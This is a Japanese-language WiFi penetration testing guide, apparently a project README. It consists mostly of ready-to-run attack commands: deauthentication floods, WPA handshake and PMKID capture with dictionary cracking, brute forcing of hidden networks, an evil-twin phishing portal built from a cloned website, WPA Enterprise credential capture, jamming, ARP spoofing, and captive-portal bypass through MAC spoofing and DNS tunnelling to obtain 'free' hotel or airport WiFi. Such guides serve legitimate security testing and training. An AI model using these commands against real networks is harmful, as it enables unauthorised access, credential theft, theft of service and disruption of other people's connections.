
WiFiペネトレーションテストガイド
2.1. キャプティブポータル
2.2. 中間者攻撃
3.1. クライアントなし
4.1. 4ウェイハンドシェイクのクラッキング
4.2. PMKID攻撃
4.3. APなし攻撃
5.1. 偽のアクセスポイント
5.2. ブルートフォース
5.3. サポートされているEAP方式
6.1. Krack攻撃とFrag攻撃
6.2. OSINT
6.3. WiFiジャミング
6.4. その他のフレームワーク
7.1. ルーターへの攻撃
7.2. スキャナーの種類
7.3. スプーフィング
VARIABLE=value
iwconfig $IFACE
ifconfig $IFACE
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up
モニターモードを設定する
Airodump-ng-ngを実行する
airodump-ng $IFACE -c $CHANNEL -e $ESSID
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
Airodump-ngを使用してネットワークを一覧表示し、APのMACアドレス($AP_MAC)とクライアントの1つ($CLIENT_MAC)を取得します。キャプチャを停止しないでください。
別の端末で、クライアントまたはすべてのクライアントを認証解除します。Airodump-ngがこのネットワークからのハンドシェイクをキャプチャすると、最初の端末に名前またはESSIDが表示されます。
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
Airodump-ngを使用してネットワークを一覧表示し、APのMACアドレス($AP_MAC)とクライアントの1つ($CLIENT_MAC)を取得します。キャプチャを停止しないでください。
2.a. 辞書攻撃を実行する
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
2.b. またはブルートフォース攻撃を実行する
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET
文字セットには、l(小文字)、u(大文字)、n(数字)、c(小文字+大文字)、m(小文字+大文字+数字)、a(すべての印字可能文字)を使用できます。
HTTrack を使用してWebサイトをクローンする
Wifiphiser をインストールします。wifiphisher/data/phishing-pages/new_page/html に新しいフォルダを作成し、HTTrackの結果を追加します。また、wifiphisher/data/phishing-pages/new_page/config.ini に設定ファイルを追加します。
python setup.py install または bin 内のバイナリを使用してプロジェクトを再コンパイルします。
以下のコマンドは、hostapdをインストールした最新のKaliリリースで正しく動作します。
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
キャプティブポータルをバイパスする最初の方法は、MACアドレスを既に認証済みのユーザーのものに変更することです。
macchanger
これ(Bash)のようなカスタムスクリプト
また、以下のような自動化スクリプトを使用することもできます。
2つ目の方法は、DNSトンネルを作成することです。このためには、自分自身でアクセス可能なDNSサーバーが必要です。この方法を使用して、ホテルや空港などでキャプティブポータルをバイパスし、「無料」のWiFiを利用できます。
nslookup example.com
「Aレコード」: dns.$DOMAIN を $SERVER_IP に向ける(例: dns.domain.com 139.59.172.117)
「NSレコード」: hack.$DOMAIN を dns.$DOMAIN に向ける(例: hack.domain.com dns.domain.com)
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
こちら で正しく動作するか確認します
クライアント側の実行
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
ssh -D 8080 [email protected]
ネットワークに接続したら、中間者攻撃に対して脆弱かどうかをテストできます。
Ettercap を使用したARPスプーフィング攻撃
WiresharkまたはTCPdumpを使用してトラフィックをスニッフィングする
PCredz(Linux)または Network Miner(Windows)を使用してトラフィックを分析する
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng $PCAP_FILE
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng -w $WORDLIST capture.cap
ワードリストはこちらから入手できます。
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db
このスクリプトを使用するか、以下の手順に従ってください。
HcxdumptoolとHcxtoolをインストールします(このスクリプトを使用できます)。
Network Managerを停止する
airmon-ng check kill
3a. 特定のMACアドレスを攻撃する場合
echo $MAC | sed 's/://g' > $FILTER_FILE
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
各行の構造は: PMKID * ルーターMAC * ステーション * ESSID(確認: https://www.rapidtables.com/convert/number/hex-to-ascii.html)
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
WiFi接続がオンになっているクライアントデバイスにアクセスできるが、周囲にネットワークがない場合でも、そのクライアントデバイスが以前に接続したことがあるネットワークを攻撃できます。
そのためには、この設定ファイルのようなものを使ってhostapdで偽のアクセスポイントを作成し、任意のパスワードで同じネットワーク名を使用します。偽のネットワークを作成すると、クライアントデバイスがそれに接続しようとし、このガイドの4.1節と同じように4ウェイハンドシェイクを取得できます。
仮想マシンを使用したくない場合は、以下を使用してすべてをインストールできます。
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
cd WPA_Enterprise_Attack && sudo sh install.sh
アクセスポイントを起動します。
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE
クライアントが接続したら、ログを読み取ります。
sh freeradius_wpe_read.sh
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE
サポートされているEAP方式を調べる
これらは、偉大な Mathy Vanhoef によって発見された2つの高度な攻撃です。
Krack Attack Scripts - このWebサイトで説明されています
Frag Attack Scripts - このWebサイトで説明されています
偽のアクセスポイントを除くすべてのデバイスを認証解除する例:
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC
Linux:
Windows:
ネットワークに接続したら
Nmap/Zenmap - セキュリティスキャナー、ポートスキャナー、ネットワーク探索ツール
Masscan - nmapの高速版(設定を壊す可能性があるため注意してください)
Netdiscover - ARPスニッフィング。ネットワークが細かくセグメント化されている場合に非常に便利です
| オペレーティングシステム | プラットフォーム | 認証情報 | サイズ | リンク |
|---|
| Ubuntu 16.04.5 | VMware | ricardojoserf:wifi | 3.25 GB | MEGA |
| Kali 2019.1 | VMware | root:wifi | 4.99 GB | MEGA |
| Ubuntu 16.04.5 | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 GB | MEGA |
| Kali 2019.1 | VirtualBox (OVA) | root:wifi | 5.56 GB | MEGA |